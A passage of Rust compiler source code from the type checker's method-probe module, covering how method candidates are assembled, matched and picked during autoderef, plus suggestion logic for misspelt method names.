self.tcx.adjust_ident_and_get_scope(name, item.container.id(), self.body_id).1; item.vis.is_accessible_from(def_scope, self.tcx) } else { true }; if is_accessible { if is_inherent { self.inherent_candidates.push(candidate); } else { self.extension_candidates.push(candidate); } } else if self.private_candidate.is_none() { self.private_candidate = Some((candidate.item.def_kind(), candidate.item.def_id)); } } fn assemble_inherent_candidates(&mut self) { let steps = self.steps.clone(); for step in steps.iter() { self.assemble_probe(&step.self_ty); } } fn assemble_probe(&mut self, self_ty: &Canonical<'tcx, QueryResponse<'tcx, Ty<'tcx>>>) { debug!("assemble_probe: self_ty={:?}", self_ty); let lang_items = self.tcx.lang_items(); match self_ty.value.value.kind { ty::Dynamic(ref data, ..) => { if let Some(p) = data.principal() { // Subtle: we can't use `instantiate_query_response` here: using it will // commit to all of the type equalities assumed by inference going through // autoderef (see the `method-probe-no-guessing` test). // // However, in this code, it is OK if we end up with an object type that is // "more general" than the object type that we are evaluating. For *every* // object type `MY_OBJECT`, a function call that goes through a trait-ref // of the form `<MY_OBJECT as SuperTraitOf(MY_OBJECT)>::func` is a valid // `ObjectCandidate`, and it should be discoverable "exactly" through one // of the iterations in the autoderef loop, so there is no problem with it // being discoverable in another one of these iterations. // // Using `instantiate_canonical_with_fresh_inference_vars` on our // `Canonical<QueryResponse<Ty<'tcx>>>` and then *throwing away* the // `CanonicalVarValues` will exactly give us such a generalization - it // will still match the original object type, but it won't pollute our // type variables in any form, so just do that! let (QueryResponse { value: generalized_self_ty, .. }, _ignored_var_values) = self.fcx.instantiate_canonical_with_fresh_inference_vars( self.span, &self_ty); self.assemble_inherent_candidates_from_object(generalized_self_ty); self.assemble_inherent_impl_candidates_for_type(p.def_id()); } } ty::Adt(def, _) => { self.assemble_inherent_impl_candidates_for_type(def.did); } ty::Foreign(did) => { self.assemble_inherent_impl_candidates_for_type(did); } ty::Param(p) => { self.assemble_inherent_candidates_from_param(p); } ty::Bool => { let lang_def_id = lang_items.bool_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Char => { let lang_def_id = lang_items.char_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Str => { let lang_def_id = lang_items.str_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.str_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Slice(_) => { let lang_def_id = lang_items.slice_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_u8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_u8_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::RawPtr(ty::TypeAndMut { ty: _, mutbl: hir::Mutability::Not }) => { let lang_def_id = lang_items.const_ptr_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::RawPtr(ty::TypeAndMut { ty: _, mutbl: hir::Mutability::Mut }) => { let lang_def_id = lang_items.mut_ptr_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I8) => { let lang_def_id = lang_items.i8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I16) => { let lang_def_id = lang_items.i16_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I32) => { let lang_def_id = lang_items.i32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I64) => { let lang_def_id = lang_items.i64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I128) => { let lang_def_id = lang_items.i128_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::Isize) => { let lang_def_id = lang_items.isize_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U8) => { let lang_def_id = lang_items.u8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U16) => { let lang_def_id = lang_items.u16_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U32) => { let lang_def_id = lang_items.u32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U64) => { let lang_def_id = lang_items.u64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U128) => { let lang_def_id = lang_items.u128_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::Usize) => { let lang_def_id = lang_items.usize_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Float(ast::FloatTy::F32) => { let lang_def_id = lang_items.f32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.f32_runtime_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Float(ast::FloatTy::F64) => { let lang_def_id = lang_items.f64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.f64_runtime_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } _ => {} } } fn assemble_inherent_impl_for_primitive(&mut self, lang_def_id: Option<DefId>) { if let Some(impl_def_id) = lang_def_id { self.assemble_inherent_impl_probe(impl_def_id); } } fn assemble_inherent_impl_candidates_for_type(&mut self, def_id: DefId) { let impl_def_ids = self.tcx.at(self.span).inherent_impls(def_id); for &impl_def_id in impl_def_ids.iter() { self.assemble_inherent_impl_probe(impl_def_id); } } fn assemble_inherent_impl_probe(&mut self, impl_def_id: DefId) { if !self.impl_dups.insert(impl_def_id) { return; // already visited } debug!("assemble_inherent_impl_probe {:?}", impl_def_id); for item in self.impl_or_trait_item(impl_def_id) { if !self.has_applicable_self(&item) { // No receiver declared. Not a candidate. self.record_static_candidate(ImplSource(impl_def_id)); continue } let (impl_ty, impl_substs) = self.impl_ty_and_substs(impl_def_id); let impl_ty = impl_ty.subst(self.tcx, impl_substs); // Determine the receiver type that the method itself expects. let xform_tys = self.xform_self_ty(&item, impl_ty, impl_substs); // We can't use normalize_associated_types_in as it will pollute the // fcx's fulfillment context after this probe is over. let cause = traits::ObligationCause::misc(self.span, self.body_id); let selcx = &mut traits::SelectionContext::new(self.fcx); let traits::Normalized { value: (xform_self_ty, xform_ret_ty), obligations } = traits::normalize(selcx, self.param_env, cause, &xform_tys); debug!("assemble_inherent_impl_probe: xform_self_ty = {:?}/{:?}", xform_self_ty, xform_ret_ty); self.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: InherentImplCandidate(impl_substs, obligations), import_ids: smallvec![] }, true); } } fn assemble_inherent_candidates_from_object(&mut self, self_ty: Ty<'tcx>) { debug!("assemble_inherent_candidates_from_object(self_ty={:?})", self_ty); let principal = match self_ty.kind { ty::Dynamic(ref data, ..) => Some(data), _ => None }.and_then(|data| data.principal()).unwrap_or_else(|| { span_bug!(self.span, "non-object {:?} in assemble_inherent_candidates_from_object", self_ty) }); // It is illegal to invoke a method on a trait instance that // refers to the `Self` type. An error will be reported by // `enforce_object_limitations()` if the method refers to the // `Self` type anywhere other than the receiver. Here, we use // a substitution that replaces `Self` with the object type // itself. Hence, a `&self` method will wind up with an // argument type like `&Trait`. let trait_ref = principal.with_self_ty(self.tcx, self_ty); self.elaborate_bounds(iter::once(trait_ref), |this, new_trait_ref, item| { let new_trait_ref = this.erase_late_bound_regions(&new_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, new_trait_ref.self_ty(), new_trait_ref.substs); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: ObjectCandidate, import_ids: smallvec![] }, true); }); } fn assemble_inherent_candidates_from_param(&mut self, param_ty: ty::ParamTy) { // FIXME: do we want to commit to this behavior for param bounds? let bounds = self.param_env .caller_bounds .iter() .filter_map(|predicate| { match *predicate { ty::Predicate::Trait(ref trait_predicate) => { match trait_predicate.skip_binder().trait_ref.self_ty().kind { ty::Param(ref p) if *p == param_ty => { Some(trait_predicate.to_poly_trait_ref()) } _ => None, } } ty::Predicate::Subtype(..) | ty::Predicate::Projection(..) | ty::Predicate::RegionOutlives(..) | ty::Predicate::WellFormed(..) | ty::Predicate::ObjectSafe(..) | ty::Predicate::ClosureKind(..) | ty::Predicate::TypeOutlives(..) | ty::Predicate::ConstEvaluatable(..) => None, } }); self.elaborate_bounds(bounds, |this, poly_trait_ref, item| { let trait_ref = this.erase_late_bound_regions(&poly_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, trait_ref.self_ty(), trait_ref.substs); // Because this trait derives from a where-clause, it // should not contain any inference variables or other // artifacts. This means it is safe to put into the // `WhereClauseCandidate` and (eventually) into the // `WhereClausePick`. assert!(!trait_ref.substs.needs_infer()); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: WhereClauseCandidate(poly_trait_ref), import_ids: smallvec![] }, true); }); } // Do a search through a list of bounds, using a callback to actually // create the candidates. fn elaborate_bounds<F>( &mut self, bounds: impl Iterator<Item = ty::PolyTraitRef<'tcx>>, mut mk_cand: F, ) where F: for<'b> FnMut(&mut ProbeContext<'b, 'tcx>, ty::PolyTraitRef<'tcx>, ty::AssocItem), { let tcx = self.tcx; for bound_trait_ref in traits::transitive_bounds(tcx, bounds) { debug!("elaborate_bounds(bound_trait_ref={:?})", bound_trait_ref); for item in self.impl_or_trait_item(bound_trait_ref.def_id()) { if !self.has_applicable_self(&item) { self.record_static_candidate(TraitSource(bound_trait_ref.def_id())); } else { mk_cand(self, bound_trait_ref, item); } } } } fn assemble_extension_candidates_for_traits_in_scope(&mut self, expr_hir_id: hir::HirId) -> Result<(), MethodError<'tcx>> { if expr_hir_id == hir::DUMMY_HIR_ID { return Ok(()) } let mut duplicates = FxHashSet::default(); let opt_applicable_traits = self.tcx.in_scope_traits(expr_hir_id); if let Some(applicable_traits) = opt_applicable_traits { for trait_candidate in applicable_traits.iter() { let trait_did = trait_candidate.def_id; if duplicates.insert(trait_did) { let import_ids = trait_candidate.import_ids.iter().map(|node_id| self.fcx.tcx.hir().node_to_hir_id(*node_id)).collect(); let result = self.assemble_extension_candidates_for_trait(import_ids, trait_did); result?; } } } Ok(()) } fn assemble_extension_candidates_for_all_traits(&mut self) -> Result<(), MethodError<'tcx>> { let mut duplicates = FxHashSet::default(); for trait_info in suggest::all_traits(self.tcx) { if duplicates.insert(trait_info.def_id) { self.assemble_extension_candidates_for_trait(smallvec![], trait_info.def_id)?; } } Ok(()) } pub fn matches_return_type(&self, method: &ty::AssocItem, self_ty: Option<Ty<'tcx>>, expected: Ty<'tcx>) -> bool { match method.kind { ty::AssocKind::Method => { let fty = self.tcx.fn_sig(method.def_id); self.probe(|_| { let substs = self.fresh_substs_for_item(self.span, method.def_id); let fty = fty.subst(self.tcx, substs); let (fty, _) = self.replace_bound_vars_with_fresh_vars( self.span, infer::FnCall, &fty ); if let Some(self_ty) = self_ty { if self.at(&ObligationCause::dummy(), self.param_env) .sup(fty.inputs()[0], self_ty) .is_err() { return false } } self.can_sub(self.param_env, fty.output(), expected).is_ok() }) } _ => false, } } fn assemble_extension_candidates_for_trait(&mut self, import_ids: SmallVec<[hir::HirId; 1]>, trait_def_id: DefId) -> Result<(), MethodError<'tcx>> { debug!("assemble_extension_candidates_for_trait(trait_def_id={:?})", trait_def_id); let trait_substs = self.fresh_item_substs(trait_def_id); let trait_ref = ty::TraitRef::new(trait_def_id, trait_substs); if self.tcx.is_trait_alias(trait_def_id) { // For trait aliases, assume all super-traits are relevant. let bounds = iter::once(trait_ref.to_poly_trait_ref()); self.elaborate_bounds(bounds, |this, new_trait_ref, item| { let new_trait_ref = this.erase_late_bound_regions(&new_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, new_trait_ref.self_ty(), new_trait_ref.substs); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, import_ids: import_ids.clone(), kind: TraitCandidate(new_trait_ref), }, true); }); } else { debug_assert!(self.tcx.is_trait(trait_def_id)); for item in self.impl_or_trait_item(trait_def_id) { // Check whether `trait_def_id` defines a method with suitable name. if !self.has_applicable_self(&item) { debug!("method has inapplicable self"); self.record_static_candidate(TraitSource(trait_def_id)); continue; } let (xform_self_ty, xform_ret_ty) = self.xform_self_ty(&item, trait_ref.self_ty(), trait_substs); self.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, import_ids: import_ids.clone(), kind: TraitCandidate(trait_ref), }, false); } } Ok(()) } fn candidate_method_names(&self) -> Vec<ast::Ident> { let mut set = FxHashSet::default(); let mut names: Vec<_> = self.inherent_candidates .iter() .chain(&self.extension_candidates) .filter(|candidate| { if let Some(return_ty) = self.return_type { self.matches_return_type(&candidate.item, None, return_ty) } else { true } }) .map(|candidate| candidate.item.ident) .filter(|&name| set.insert(name)) .collect(); // Sort them by the name so we have a stable result. names.sort_by_cached_key(|n| n.as_str()); names } /////////////////////////////////////////////////////////////////////////// // THE ACTUAL SEARCH fn pick(mut self) -> PickResult<'tcx> { assert!(self.method_name.is_some()); if let Some(r) = self.pick_core() { return r; } debug!("pick: actual search failed, assemble diagnotics"); let static_candidates = mem::take(&mut self.static_candidates); let private_candidate = self.private_candidate.take(); let unsatisfied_predicates = mem::take(&mut self.unsatisfied_predicates); // things failed, so lets look at all traits, for diagnostic purposes now: self.reset(); let span = self.span; let tcx = self.tcx; self.assemble_extension_candidates_for_all_traits()?; let out_of_scope_traits = match self.pick_core() { Some(Ok(p)) => vec![p.item.container.id()], //Some(Ok(p)) => p.iter().map(|p| p.item.container().id()).collect(), Some(Err(MethodError::Ambiguity(v))) => { v.into_iter() .map(|source| { match source { TraitSource(id) => id, ImplSource(impl_id) => { match tcx.trait_id_of_impl(impl_id) { Some(id) => id, None => { span_bug!(span, "found inherent method when looking at traits") } } } } }) .collect() } Some(Err(MethodError::NoMatch(NoMatchData { out_of_scope_traits: others, .. }))) => { assert!(others.is_empty()); vec![] } _ => vec![], }; if let Some((kind, def_id)) = private_candidate { return Err(MethodError::PrivateMatch(kind, def_id, out_of_scope_traits)); } let lev_candidate = self.probe_for_lev_candidate()?; Err(MethodError::NoMatch(NoMatchData::new(static_candidates, unsatisfied_predicates, out_of_scope_traits, lev_candidate, self.mode))) } fn pick_core(&mut self) -> Option<PickResult<'tcx>> { let steps = self.steps.clone(); // find the first step that works steps .iter() .filter(|step| { debug!("pick_core: step={:?}", step); // skip types that are from a type error or that would require dereferencing // a raw pointer !step.self_ty.references_error() && !step.from_unsafe_deref }).flat_map(|step| { let InferOk { value: self_ty, obligations: _ } = self.fcx.probe_instantiate_query_response( self.span, &self.orig_steps_var_values, &step.self_ty ).unwrap_or_else(|_| { span_bug!(self.span, "{:?} was applicable but now isn't?", step.self_ty) }); self.pick_by_value_method(step, self_ty).or_else(|| { self.pick_autorefd_method(step, self_ty, hir::Mutability::Not).or_else(|| { self.pick_autorefd_method(step, self_ty, hir::Mutability::Mut) })})}) .next() } fn pick_by_value_method( &mut self, step: &CandidateStep<'tcx>, self_ty: Ty<'tcx>, ) -> Option<PickResult<'tcx>> { //! For each type `T` in the step list, this attempts to find a //! method where the (transformed) self type is exactly `T`. We //! do however do one transformation on the adjustment: if we //! are passing a region pointer in, we will potentially //! *reborrow* it to a shorter lifetime. This allows us to //! transparently pass `&mut` pointers, in particular, without //! consuming them for their entire lifetime. if step.unsize { return None; } self.pick_method(self_ty).map(|r| { r.map(|mut pick| { pick.autoderefs = step.autoderefs; // Insert a `&*` or `&mut *` if this is a reference type: if let ty::Ref(_, _, mutbl) = step.self_ty.value.value.kind { pick.autoderefs += 1; pick.autoref = Some(mutbl); } pick }) }) } fn pick_autorefd_method( &mut self, step: &CandidateStep<'tcx>, self_ty: Ty<'tcx>, mutbl: hir::Mutability, ) -> Option<PickResult<'tcx>> { let tcx = self.tcx; // In general, during probing we erase regions. See // `impl_self_ty()` for an explanation. let region = tcx.lifetimes.re_erased; let autoref_ty = tcx.mk_ref(region, ty::TypeAndMut { ty: self_ty, mutbl }); self.pick_method(autoref_ty).map(|r| { r.map(|mut pick| { pick.autoderefs = step.autoderefs; pick.autoref = Some(mutbl); pick.unsize = step.unsize.then_some(self_ty); pick }) }) } fn pick_method(&mut self, self_ty: Ty<'tcx>) -> Option<PickResult<'tcx>> { debug!("pick_method(self_ty={})", self.ty_to_string(self_ty)); let mut possibly_unsatisfied_predicates = Vec::new(); let mut unstable_candidates = Vec::new(); for (kind, candidates) in &[ ("inherent", &self.inherent_candidates), ("extension", &self.extension_candidates), ] { debug!("searching {} candidates", kind); let res = self.consider_candidates( self_ty, candidates.iter(), &mut possibly_unsatisfied_predicates, Some(&mut unstable_candidates), ); if let Some(pick) = res { if !self.is_suggestion.0 && !unstable_candidates.is_empty() { if let Ok(p) = &pick { // Emit a lint if there are unstable candidates alongside the stable ones. // // We suppress warning if we're picking the method only because it is a // suggestion. self.emit_unstable_name_collision_hint(p, &unstable_candidates); } } return Some(pick); } } debug!("searching unstable candidates"); let res = self.consider_candidates( self_ty, unstable_candidates.into_iter().map(|(c, _)| c), &mut possibly_unsatisfied_predicates, None, ); if res.is_none() { self.unsatisfied_predicates.extend(possibly_unsatisfied_predicates); } res } fn consider_candidates<'b, ProbesIter>( &self, self_ty: Ty<'tcx>, probes: ProbesIter, possibly_unsatisfied_predicates: &mut Vec<TraitRef<'tcx>>, unstable_candidates: Option<&mut Vec<(&'b Candidate<'tcx>, Symbol)>>, ) -> Option<PickResult<'tcx>> where ProbesIter: Iterator<Item = &'b Candidate<'tcx>> + Clone, { let mut applicable_candidates: Vec<_> = probes.clone() .map(|probe| { (probe, self.consider_probe(self_ty, probe, possibly_unsatisfied_predicates)) }) .filter(|&(_, status)| status != ProbeResult::NoMatch) .collect(); debug!("applicable_candidates: {:?}", applicable_candidates); if applicable_candidates.len() > 1 { if let Some(pick) = self.collapse_candidates_to_trait_pick(&applicable_candidates[..]) { return Some(Ok(pick)); } } if let Some(uc) = unstable_candidates { applicable_candidates.retain(|&(p, _)| { if let stability::EvalResult::Deny { feature, .. } = self.tcx.eval_stability(p.item.def_id, None, self.span) { uc.push((p, feature)); return false; } true }); } if applicable_candidates.len() > 1 { let sources = probes .map(|p| self.candidate_source(p, self_ty)) .collect(); return Some(Err(MethodError::Ambiguity(sources))); } applicable_candidates.pop().map(|(probe, status)| { if status == ProbeResult::Match { Ok(probe.to_unadjusted_pick()) } else { Err(MethodError::BadReturnType) } }) } fn emit_unstable_name_collision_hint( &self, stable_pick: &Pick<'_>, unstable_candidates: &[(&Candidate<'tcx>, Symbol)], ) { let mut diag = self.tcx.struct_span_lint_hir( lint::builtin::UNSTABLE_NAME_COLLISIONS, self.fcx.body_id, self.span, "a method with this name may be added to the standard library in the future", ); // FIXME: This should be a `span_suggestion` instead of `help` // However `self.span` only // highlights the method name, so we can't use it. Also consider reusing the code from // `report_method_error()`. diag.help(&format!( "call with fully qualified syntax `{}(...)` to keep using the current method", self.tcx.def_path_str(stable_pick.item.def_id), )); if nightly_options::is_nightly_build() { for (candidate, feature) in unstable_candidates { diag.help(&format!( "add `#![feature({})]` to the crate attributes to enable `{}`", feature, self.tcx.def_path_str(candidate.item.def_id), )); } } diag.emit(); } fn select_trait_candidate(&self, trait_ref: ty::TraitRef<'tcx>) -> traits::SelectionResult<'tcx, traits::Selection<'tcx>> { let cause = traits::ObligationCause::misc(self.span, self.body_id); let predicate = trait_ref.to_poly_trait_ref().to_poly_trait_predicate(); let obligation = traits::Obligation::new(cause, self.param_env, predicate); traits::SelectionContext::new(self).select(&obligation) } fn candidate_source(&self, candidate: &Candidate<'tcx>, self_ty: Ty<'tcx>) -> CandidateSource { match candidate.kind { InherentImplCandidate(..) => ImplSource(candidate.item.container.id()), ObjectCandidate | WhereClauseCandidate(_) => TraitSource(candidate.item.container.id()), TraitCandidate(trait_ref) => self.probe(|_| { let _ = self.at(&ObligationCause::dummy(), self.param_env) .sup(candidate.xform_self_ty, self_ty); match self.select_trait_candidate(trait_ref) { Ok(Some(traits::Vtable::VtableImpl(ref impl_data))) => { // If only a single impl matches, make the error message point // to that impl. ImplSource(impl_data.impl_def_id) } _ => { TraitSource(candidate.item.container.id()) } } }) } } fn consider_probe(&self, self_ty: Ty<'tcx>, probe: &Candidate<'tcx>, possibly_unsatisfied_predicates: &mut Vec<TraitRef<'tcx>>) -> ProbeResult { debug!("consider_probe: self_ty={:?} probe={:?}", self_ty, probe); self.probe(|_| { // First check that the self type can be related. let sub_obligations = match self.at(&ObligationCause::dummy(), self.param_env) .sup(probe.xform_self_ty, self_ty) { Ok(InferOk { obligations, value: () }) => obligations, Err(_) => { debug!("--> cannot relate self-types"); return ProbeResult::NoMatch; } }; let mut result = ProbeResult::Match; let selcx = &mut traits::SelectionContext::new(self); let cause = traits::ObligationCause::misc(self.span, self.body_id); // If so, impls may carry other conditions (e.g., where // clauses) that must be considered. Make sure that those // match as well (or at least may match, sometimes we // don't have enough information to fully evaluate). let candidate_obligations : Vec<_> = match probe.kind { InherentImplCandidate(ref substs, ref ref_obligations) => { // Check whether the impl imposes obligations we have to worry about. let impl_def_id = probe.item.container.id(); let impl_bounds = self.tcx.predicates_of(impl_def_id); let impl_bounds = impl_bounds.instantiate(self.tcx, substs); let traits::Normalized { value: impl_bounds, obligations: norm_obligations } = traits::normalize(selcx, self.param_env, cause.clone(), &impl_bounds); // Convert the bounds into obligations. let impl_obligations = traits::predicates_for_generics( cause, self.param_env, &impl_bounds); debug!("impl_obligations={:?}", impl_obligations); impl_obligations.into_iter() .chain(norm_obligations.into_iter()) .chain(ref_obligations.iter().cloned()) .collect() } ObjectCandidate | WhereClauseCandidate(..) => { // These have no additional conditions to check. vec![] } TraitCandidate(trait_ref) => { let predicate = trait_ref.to_predicate(); let obligation = traits::Obligation::new(cause, self.param_env, predicate); if !self.predicate_may_hold(&obligation) { if self.probe(|_| self.select_trait_candidate(trait_ref).is_err()) { // This candidate's primary obligation doesn't even // select - don't bother registering anything in // `potentially_unsatisfied_predicates`. return ProbeResult::NoMatch; } else { // Some nested subobligation of this predicate // failed. // // FIXME: try to find the exact nested subobligation // and point at it rather than reporting the entire // trait-ref? result = ProbeResult::NoMatch; let trait_ref = self.resolve_vars_if_possible(&trait_ref); possibly_unsatisfied_predicates.push(trait_ref); } } vec![] } }; debug!("consider_probe - candidate_obligations={:?} sub_obligations={:?}", candidate_obligations, sub_obligations); // Evaluate those obligations to see if they might possibly hold. for o in candidate_obligations.into_iter().chain(sub_obligations) { let o = self.resolve_vars_if_possible(&o); if !self.predicate_may_hold(&o)
} if let ProbeResult::Match = result { if let (Some(return_ty), Some(xform_ret_ty)) = (self.return_type, probe.xform_ret_ty) { let xform_ret_ty = self.resolve_vars_if_possible(&xform_ret_ty); debug!("comparing return_ty {:?} with xform ret ty {:?}", return_ty, probe.xform_ret_ty); if self.at(&ObligationCause::dummy(), self.param_env) .sup(return_ty, xform_ret_ty) .is_err() { return ProbeResult::BadReturnType; } } } result }) } /// Sometimes we get in a situation where we have multiple probes that are all impls of the /// same trait, but we don't know which impl to use. In this case, since in all cases the /// external interface of the method can be determined from the trait, it's ok not to decide. /// We can basically just collapse all of the probes for various impls into one where-clause /// probe. This will result in a pending obligation so when more type-info is available we can /// make the final decision. /// /// Example (`src/test/ui/method-two-trait-defer-resolution-1.rs`): /// /// ``` /// trait Foo { ... } /// impl Foo for Vec<int> { ... } /// impl Foo for Vec<usize> { ... } /// ``` /// /// Now imagine the receiver is `Vec<_>`. It doesn't really matter at this time which impl we /// use, so it's ok to just commit to "using the method from the trait Foo". fn collapse_candidates_to_trait_pick(&self, probes: &[(&Candidate<'tcx>, ProbeResult)]) -> Option<Pick<'tcx>> { // Do all probes correspond to the same trait? let container = probes[0].0.item.container; if let ty::ImplContainer(_) = container { return None } if probes[1..].iter().any(|&(p, _)| p.item.container != container) { return None; } // FIXME: check the return type here somehow. // If so, just use this trait and call it a day. Some(Pick { item: probes[0].0.item.clone(), kind: TraitPick, import_ids: probes[0].0.import_ids.clone(), autoderefs: 0, autoref: None, unsize: None, }) } /// Similarly to `probe_for_return_type`, this method attempts to find the best matching /// candidate method where the method name may have been misspelt. Similarly to other /// Levenshtein based suggestions, we provide at most one such suggestion. fn probe_for_lev_candidate(&mut self) -> Result<Option<ty::AssocItem>, MethodError<'tcx>> { debug!("probing for method names similar to {:?}", self.method_name); let steps = self.steps.clone(); self.probe(|_| { let mut pcx = ProbeContext::new(self.fcx, self.span, self.mode, self.method_name, self.return_type, self.orig_steps_var_values.clone(), steps, IsSuggestion(true)); pcx.allow_similar_names = true; pcx.assemble_inherent_candidates(); pcx.assemble_extension_candidates_for_traits_in_scope(hir::DUMMY_HIR_ID)?; let method_names = pcx.candidate_method_names(); pcx.allow_similar_names = false; let applicable_close_candidates: Vec<ty::AssocItem> = method_names .iter() .filter_map(|&method_name| { pcx.reset(); pcx.method_name = Some(method_name); pcx.assemble_inherent_candidates(); pcx.assemble_extension_candidates_for_traits_in_scope(hir::DUMMY_HIR_ID) .map_or(None, |_| { pcx.pick_core() .and_then(|pick| pick.ok()) .and_then(|pick| Some(pick.item)) }) }) .collect(); if applicable_close_candidates.is_empty() { Ok(None) } else { let best_name = { let names = applicable_close_candidates.iter().map(|cand| &cand.ident.name); find_best_match_for_name(names, &self.method_name.unwrap().as_str(), None) }.unwrap(); Ok(applicable_close_candidates .into_iter() .find(|method| method.ident.name == best_name)) } }) } /////////////////////////////////////////////////////////////////////////// // MISCELLANY fn has_applicable_self(&self, item: &ty::AssocItem) -> bool { // "Fast track" -- check for usage of sugar when in method call // mode. // // In Path mode (i.e., resolving a value like `T::next`), consider any // associated value (i.e., methods, constants) but not types. match self.mode { Mode::MethodCall => item.method_has_self_argument, Mode::Path => match item.kind { ty::AssocKind::OpaqueTy | ty::AssocKind::Type => false, ty::AssocKind::Method | ty::AssocKind::Const => true }, } // FIXME -- check for types that deref to `Self`, // like `Rc<Self>` and so on. // // Note also that the current code will break if this type // includes any of the type parameters defined on the method // -- but this could be overcome. } fn record_static_candidate(&mut self, source: CandidateSource) { self.static_candidates.push(source); } fn xform_self_ty(&self, item: &ty::AssocItem, impl_ty: Ty<'tcx>, substs: SubstsRef<'tcx>) -> (Ty<'tcx>, Option<Ty<'tcx>>) { if item.kind == ty::AssocKind::Method && self.mode == Mode::MethodCall { let sig = self.xform_method_sig(item.def_id, substs); (sig.inputs()[0], Some(sig.output())) } else { (impl_ty, None) } } fn xform_method_sig(&self, method: DefId, substs: SubstsRef<'tcx>) -> ty::FnSig<'tcx> { let fn_sig = self.tcx.fn_sig(method); debug!("xform_self_ty(fn_sig={:?}, substs={:?})", fn_sig, substs); assert!(!substs.has_escaping_bound_vars()); // It is possible for type parameters or early-bound lifetimes // to appear in the signature of `self`. The substitutions we // are given do not include type/lifetime parameters for the // method yet. So create fresh variables here for those too, // if there are any. let generics = self.tcx.generics_of(method); assert_eq!(substs.len(), generics.parent_count as usize); // Erase any late-bound regions from the method and substitute // in the values from the substitution. let xform_fn_sig = self.erase_late_bound_regions(&fn_sig); if generics.params.is_empty() { xform_fn_sig.subst(self.tcx, substs) } else { let substs = InternalSubsts::for_item(self.tcx, method, |param, _| { let i = param.index as usize; if i < substs.len() { substs[i] } else { match param.kind { GenericParamDefKind::Lifetime => { // In general, during probe we erase regions. See // `impl_self_ty()` for an explanation. self.tcx.lifetimes.re_erased.into() } GenericParamDefKind::Type { .. } | GenericParamDefKind::Const => { self.var_for_def(self.span, param) } } } }); xform_fn_sig.subst(self.tcx, substs) } } /// Gets the type of an impl and generate substitutions with placeholders. fn impl_ty_and_substs(&self, impl_def_id: DefId) -> (Ty<'tcx>, SubstsRef<'tcx>) { (self.tcx.type_of(impl_def_id), self.fresh_item_substs(impl_def_id)) } fn fresh_item_substs(&self, def_id: DefId) -> SubstsRef<'tcx> { InternalSubsts::for_item(self.tcx, def_id, |param, _| { match param.kind { GenericParamDefKind::Lifetime => self.tcx.lifetimes.re_erased.into(), GenericParamDefKind::Type { .. } => { self.next_ty_var(TypeVariableOrigin { kind: TypeVariableOriginKind::SubstitutionPlaceholder, span: self.tcx.def_span(def_id), }).into() } GenericParamDefKind::Const { .. } => { let span = self.tcx.def_span(def_id); let origin = ConstVariableOrigin { kind: ConstVariableOriginKind::SubstitutionPlaceholder, span, }; self.next_const_var(self.tcx.type_of(param.def_id), origin).into() } } }) } /// Replaces late-bound-regions bound by `value` with `'static` using /// `ty::erase_late_bound_regions`. /// /// This is only a reasonable thing to do during the *probe* phase, not the *confirm* phase, of /// method matching. It is reasonable during the probe phase because we don't consider region /// relationships at all. Therefore, we can just replace all the region variables with 'static /// rather than creating fresh region variables. This is nice for two reasons: /// /// 1. Because the numbers of the region variables would otherwise be fairly unique to this /// particular method call, it winds up creating fewer types overall, which helps for memory /// usage. (Admittedly, this is a rather small effect, though measurable.) /// /// 2. It makes it easier to deal with higher-ranked trait bounds, because we can replace any /// late-bound regions with 'static. Otherwise, if we were going to replace late-bound /// regions with actual region variables as is proper, we'd have to ensure that the same /// region got replaced with the same variable, which requires a bit more coordination /// and/or tracking the substitution and /// so forth. fn erase_late_bound_regions<T>(&self, value: &ty::Binder<T>) -> T where T: TypeFoldable<'tcx> { self.tcx.erase_late_bound_regions(value) } /// Finds the method with the appropriate name (or return type, as the case may be). If /// `allow_similar_names` is set, find methods with close-matching names. fn impl_or_trait_item(&self, def_id: DefId) -> Vec<ty::AssocItem> { if let Some(name) = self.method_name { if self.allow_similar_names { let max_dist = max(name.as_str().len(), 3) / 3; self.tcx.associated_items(def_id) .filter(|x| { let dist = lev_distance(&*name.as_str(), &x.ident.as_str()); 